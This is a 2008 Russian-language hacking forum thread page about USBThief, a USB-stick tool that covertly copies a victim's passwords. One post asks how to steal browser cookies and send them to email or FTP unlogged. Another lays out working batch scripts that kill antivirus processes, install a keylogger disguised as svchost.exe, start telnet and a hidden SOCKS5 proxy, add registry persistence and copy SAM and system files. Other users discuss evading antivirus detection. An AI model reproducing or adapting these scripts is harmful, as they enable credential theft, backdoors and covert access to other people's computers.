ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность
Перезагрузить страницу USBThief: копируем пароли жертвы, путем вставки USB носителя.
   
Ответ
Страница 6 из 12 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 16.09.2008, 23:51
immortal16
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302

Репутация: 3
По умолчанию
кто подскажет как такую фичу сделать тока чтоб кукисы со всех браузеров искала и кидала в папку на флэшке !т.е. втыкнул и достал а кукисы уже у тебя!как ето реализовать !?кто подскажет!?и тоже самое тока чтоб не на флэшку а на мыло или фтп какойниб!?желательно чтоб все действия не логирвались!заранее пасиб!
 
Ответить с цитированием

  #52  
Старый 17.09.2008, 21:34
lilsaint
Участник форума
Регистрация: 07.07.2008
Сообщений: 136
Провел на форуме:
1259630

Репутация: 403
Отправить сообщение для lilsaint с помощью ICQ
По умолчанию
не знаю все зделал по инструкции, но нифига не работает на 3-ех компах пробывал(((
 
Ответить с цитированием

  #53  
Старый 22.09.2008, 18:00
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


Отправить сообщение для Fooog с помощью ICQ Отправить сообщение для Fooog с помощью AIM Отправить сообщение для Fooog с помощью Yahoo
По умолчанию
А можно чтоб вместе с прогой во флешке были разные файлы и папки???
 
Ответить с цитированием

  #54  
Старый 22.09.2008, 18:09
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию
Цитата:
Сообщение от Fooog  
А можно чтоб вместе с прогой во флешке были разные файлы и папки???
что ты имеешь ввиду? название фолдера поменять?
 
Ответить с цитированием

  #55  
Старый 23.09.2008, 08:38
dd_
Познающий
Регистрация: 17.04.2008
Сообщений: 37
Провел на форуме:
116391

Репутация: 12
По умолчанию
Цитата:
Сообщение от Fooog  
А можно чтоб вместе с прогой во флешке были разные файлы и папки???
Можно, сколько угодно.
 
Ответить с цитированием

  #56  
Старый 06.10.2008, 14:41
loman8е
Новичок
Регистрация: 10.01.2008
Сообщений: 1
Провел на форуме:
10171

Репутация: 0
По умолчанию
народ а есть чтонибудь по новей этой проги...??
а то она у меня на компе только 2 пароля нашла и на других тоже самое!!
 
Ответить с цитированием

  #57  
Старый 04.11.2008, 10:15
cyk10id
Новичок
Регистрация: 14.08.2008
Сообщений: 22
Провел на форуме:
70238

Репутация: 2
По умолчанию
можно немного модифицировать USBThief. я сделал это так.Для начала изменяем файл progstart.bat

@echo off
rem ========Запуск основных програм для сбора паролей
rem nircmd.exe execmd CALL batexe\go.bat
rem ========Запуск и копирование клавиатурного шпиона
rem nircmd.exe execmd CALL batexe\spook.bat
rem ========Запуск и копирование боунсера(создание туннеля.прокси)
nircmd.exe execmd CALL batexe\bouncer.bat
rem ========Копирование базы SAM и т.д.
rem nircmd.exe execmd CALL batexe\copy.bat
rem ========просмотр портов,истории браузера,процессов,версии обновлений и т.д.
rem nircmd.exe execmd CALL batexe\infodump.bat
================================================== ======
добавив в папку batexe несколько файлов сценария и программ.
==============сценарии:
==========go.bat
@echo off
tskill avp.exe
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat
nircmd.exe killprocess avp.exe
==========spook.bat
@echo off
nircmd.exe execmd copy "batexe\update\svchost.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\pshook64.dll" "~$sys.temp$"
nircmd.exe execmd mkdir "~$sys.temp$\Data"
nircmd.exe execmd copy "batexe\update\pshook.dll" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\Data" "~$sys.temp$\Data\"
nircmd.exe cmdwait 20000 execmd copy "batexe\update\diary.dll" "~$sys.temp$"
nircmd.exe cmdwait 30000 execmd CALL ~$sys.temp$\svchost.exe
nircmd.exe service auto telnet
nircmd.exe service start tlntsvr
===========bouncer.bat
@echo off
nircmd.exe execmd copy "batexe\avp.bat" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avp.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avploader.exe" "~$sys.temp$"
nircmd.exe execmd CALL ~$sys.temp$\avp.exe --socks5 --port 7070 --s_user cyk10id --s_password 777 --daemon
nircmd.exe execmd CALL batexe\modsmax.bat
reg add "hklm\software\Microsoft\Windows\CurrentVersion\Ru n" /v AVP Updater /t REG_SZ /d "C:\Temp\AVP.BAT" /f
nircmd.exe execmd mkdir "dump\~$sys.computername$"
nircmd.exe execmd .\batexe\awatch.exe /shtml "dump\~$sys.computername$\NetworkAdapter.html"
===========copy.bat
@echo off
nircmd.exe execmd copy "~$sys.temp$\diary.dll" "Dump\~$sys.computername$\"
nircmd.exe execmd mkdir "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.windows$\repair" "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.system$\drivers\etc" "Dump\~$sys.computername$\system\"
nircmd.exe monitor off
===========infodump.bat
@ echo off
nircmd.exe execmd .\batexe\cports.exe /shtml "dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd .\batexe\wul.exe /shtml "dump\~$sys.computername$\InstalledUpdates.htm l"
nircmd.exe execmd .\batexe\strun.exe /shtml "dump\~$sys.computername$\Startup.html"
nircmd.exe execmd .\batexe\servimin.exe /shtml "dump\~$sys.computername$\Services.html"
nircmd.exe execmd .\batexe\CProcess.exe /shtml "dump\~$sys.computername$\CProcess.html"
nircmd.exe execmd .\batexe\iehv.exe /shtml "dump\~$sys.computername$\history.html"
nircmd.exe execmd .\batexe\ProduKey.exe /shtml "dump\~$sys.computername$\ProductKey.html"
===========avp.bat
@echo off
nircmd.exe execmd avp.exe --socks5 --port 7070 --daemon
================================================== =======
создаем эти сценарии и приступим к софту
bouncer (для открытия прокси на компе) переименовываем на avp.exe для маскировки в процессах.копируем в batexe nircmd.exe и переименовываем его на AVPUpdater.exe
так же поступаем с Punto Svitcher"ом переименовывая его в svchost.exe(установи Punto Svitcher(PS) и тупо скопируй все файлы с его директории на batexe/update + изменённый PS )в настройках PS укажи неотображатся в трее. и нужно отключить автотранслит.прога лицензионная антивирусами не палится. Как это работает разберёшся из bat файла.
убирая и добавляя комментарии(rem) в сценарий progstart.bat можно заточить флешку на определенного юзверя.
 
Ответить с цитированием

  #58  
Старый 04.11.2008, 10:16
cyk10id
Новичок
Регистрация: 14.08.2008
Сообщений: 22
Провел на форуме:
70238

Репутация: 2
По умолчанию
PS. если понравилоь, щелкните +
 
Ответить с цитированием

  #59  
Старый 05.11.2008, 01:04
Dzhonik
Новичок
Регистрация: 03.11.2008
Сообщений: 2
Провел на форуме:
16882

Репутация: -1
По умолчанию
А как насчёт боунесера, самого ексешника, он ведь всеми антивирями палится!!!
 
Ответить с цитированием

  #60  
Старый 07.11.2008, 19:06
s0ul
Новичок
Регистрация: 10.09.2007
Сообщений: 3
Провел на форуме:
41161

Репутация: 0
По умолчанию
жаль что уже он палится
 
Ответить с цитированием
Ответ
Страница 6 из 12 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PasswordsPro - Таинственный мир хэшей -=lebed=- Чужие Статьи 10 14.07.2008 15:34
СЭСИИИ ПАРОЛИ Fr1k Чаты 0 09.09.2004 19:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ